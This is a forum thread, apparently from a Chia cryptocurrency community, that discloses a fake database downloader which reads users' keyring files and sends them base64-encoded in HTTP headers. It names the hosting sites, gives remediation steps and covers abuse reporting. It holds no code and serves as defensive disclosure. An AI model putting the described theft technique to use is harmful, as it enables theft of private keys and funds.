This program is stealing your private keys!

TLDR: If you used a downloader application from any of the sites listed below, your keys have been compromised. MOVE YOUR XCH IMMEDIATELY !!! Also, until you can get a new setup running, change your payout address to a cold wallet.

http://chiadb.co/
http://chiadatabase.info/
https://chiadownload.net/
https://chiafarmer.medium.com/

Now that the summary has been put out there, and the people in danger have run off to protect their assets, let’s get down to the details.

If anyone goes to one of the listed sites, it presents you with an option to download the chia database directly or download a MultiThreadDownloader that will help speed up the process.

image31400×938 84 KB

But if you try to use the direct link to download the file, it is super slow and will disconnect repeatedly, pushing the user towards the .exe, MultiThreadDownloader tool.

So we decided to dig into this “tool”. A quick dump of the exe quickly shows reference to <main.chia_keys+0xcb>. So this made us dig deeper.

image11018×933 226 KB

Then another type of search through the exe dumps out a directory table that shows the files used to compile this program. This shows that the executable was created using the Go programming language and was compiled on Windows.

image2624×675 34.9 KB

So, it’s time to fire this thing up and actually see what it is doing. With a monitoring tool running to see what it is accessing. I opened the exe and recorded its actions. And as suspected, it immediately accessed the keyring.yaml file.

image41462×351 31 KB

This alone is enough to call this malicious malware. There is absolutely no reason at all that it would need access to anything on the end user’s computer. Especially the key file for Chia. But let’s continue. Did it do anything with that information or was opening that file just some mystical accident?

Let’s look into what the program is storing in memory.

image51198×88 6.53 KB

Well look at that. The entire keyring file is now neatly stored in the downloader’s memory (the highlighted part is the beginning of the key and all the other lines are from the keyring file).

Of course this information is now in the hands of someone else that has every intention of taking your hard earned XCH.

If you ever used this piece of software, you really have no choice but to start over. Sorry.

1. Move your XCH to a cold wallet (if it’s not already been stolen).
2. Format your computer and reinstall the operating system.
3. Load Chia from scratch and setup new mnemonics.
4. Delete your old plots, and replot to the new mnemonic.
5. Remember, safety first, always use a cold wallet, and official clients / database downloads.

Official Blockchain Torrent: Downloads - Chia Network

Great job analyzing it!

Not sure, but that keyring file shows that password was not enabled for that setup, so yes, scammers have full access using that particular keyring and mnemonics. However, if there would be a password added to that setup, having that keyring would maybe not let them access that wallet. Still, having that keyring would enable those scammers to run a brute force attack to potentially crack the password, so as you said, move your XCH asap.

However, once such thing is on a box, I would assume that #1 priority for them would be to install a trojan that would allow installation of updated program in the future and use a different way to get mnemonics.

thank you for the time you spend in investigating this.

i think this will be the reason for the “massive hack” of the thousands of air gapped systems with their hot “cold wallets” that never used any third party software

this is exactly the attack vector

have a nice day everyone

With a monitoring tool running to see what it is accessing. I opened the exe and recorded its actions.

Which program are you using?
Thanks

Great effort, thank you.
1- So Keyring File was always a problem. But now my question if we set passphrase, can they get the password ? (with save passphrase option ?)
2- I never used any download programs from that site, 100% sure about it, but downloaded the DB (only db file). And yet, I’ve got hacked. Which means this exploit probably is part of other ones, so I believe this is 1 part of the hack, but there are also other programs probably.
So I’m still suspicious about PlotManager.exe, chia forks SIT,HDDcoin or maybe chives at some point. (maybe in a specific version, one of the old versions) or Hpool.

UPDATE

Another test was ran to pin down how the information was sent. Intercepting the traffic of the exe, it was found. They are sending the keyring file information encoded in base64 in the header immediately once the program obtains the keyring information. This is all done before you even tell the program to begin the download of the database. (Note: the keyring info you see in this test is different from the previous tests because this is a totally different setup just to catch this piece of the puzzle).

Here’s the intercepted HTTP request

image8967×257 37.7 KB

This image shows the header and then decoded.

image71109×296 93.8 KB

WARNING!!!
This was suspected, but now we know. Just opening the program will trigger the keyring data to be taken and sent. You don’t even have to begin the download of the database. So DO NOT play around with this program!

No fork has ever been proven yet to steal keys. The only one with potential was SIT which did a release without source code at one point. But no reports from that ever.

Even H-Pool, Dodgy as that all is, has not got a clear link to be proven to take your keys.

hey everyone,

to be clear, until you use official chia client (not cold wallet) and NOT USING ANY 3RD PARTY STUFF, are you safe?

Those three domains are controlled by godaddy.com. I have filed an abuse report with godaddy.com about it. Not sure whether godaddy will take an action or not. Also, whether they do or not, those scammers will potentially register new names somewhere else, although having the official download from chia right now will potentially minimize the number of people using that service.

Here is the link to report it (as abuse) with godaddy if anyone would also like to do it (a clean start is at the bottom of the main page) - Domain Support

Maybe someone with medium.com account can report the fourth link from the first post.

Nice analysis @TJanik and thank you for taking the time to do that. Hopefully others will see this in the future and realize that the pre-synced chia blockchain download service’s multi-threaded file downloader is a scam before they lose their keys to it.

I previously owned chiadownload.net for a while but shut down the service due to costs and recently sold the domain on Afternic. It’s too bad it’s being used for this now.

I’ve been out of Chia for a while now. It’s good to see there’s an official chia database download available at Download - Chia Network now.

Again, thanks for posting your findings and detailed proof of what it does.

All of the sites listed that hosted this malware are down (as of now). Not sure if the scammer took them down or if cloudflare did it. But the one that was on medium.com shows it was taken down and is under investigation.

So, maybe it was worth to report it to godaddy. I have to say that I didn’t believe that they will do anything. However, maybe there was a different trigger and that report just correlates with it.

Also, godaddy should get CC payment that potentially can be traced back to a physical person (if that CC was not stolen, or was coming from a country that can be legally traced). I wonder, whether godaddy reports such incidents / payment info to authorities.

Anyway, thanks to @TJanik for doing that research, as I provided link to this thread when reporting and I assume that if anything that was the key factor.

Awesome work!! You have no idea how much this is helpful to me in general. A well presented deep dive with proper documentation.

I am so glad I used the official mainnet database torrent.

Thank you once again!

isn’t that obvious from the start? anybody knows that .exe is a trap

I think it’s pretty obvious that’s not the case, as clearly people fell for it.

But people really do need to learn to be careful, but we can all get caught out from time to time.

just ask Linus about it

On a more serious note. Real safety is the ability to nuke your whole system and start again fresh without taking much damage.

LMAO

1. Linux backdoor open for 10 years - NSA-linked Bvp47 Linux backdoor widely undetected for 10 years
2. Another one - RotaJakiro: A Linux backdoor that has flown under the radar for years | ZDNET

Just getting 2 top results in search for backdoor in Linux.

However, I have heard that NutOS has no vulnerabilities.

I believe he was referring to LTT, but persistent backdoors are widely available in the wild, unfortunately more than anyone would care to believe

This backdoor wasn’t actually in the Linux kernel or in any Linux distribution, but was a Linux-based backdoor that was first detected in 2013. So, the reason it probably went under the radar for so many years was because it was a) very covert, and b) only planted on very few targeted systems through some other compromise. I didn’t look at the second one but would guess it is something similar.

A Discussion of Ken Thompson's "Reflections on Trusting Trust" Seems fitting for this thread!

It appears that the sites shilling this malware are not down, the owner of the site just began blocking a lot of regions to make it look that way. But it appears to be still live in at least China. So, if anyone here can repost this research in Chinese here or in locations that Chinese Chia farmers would find it, that would be great.

Also, if there are some Chinese farmers here, please report these sites to whatever authorities there are that can take them down. People are still getting hurt by this.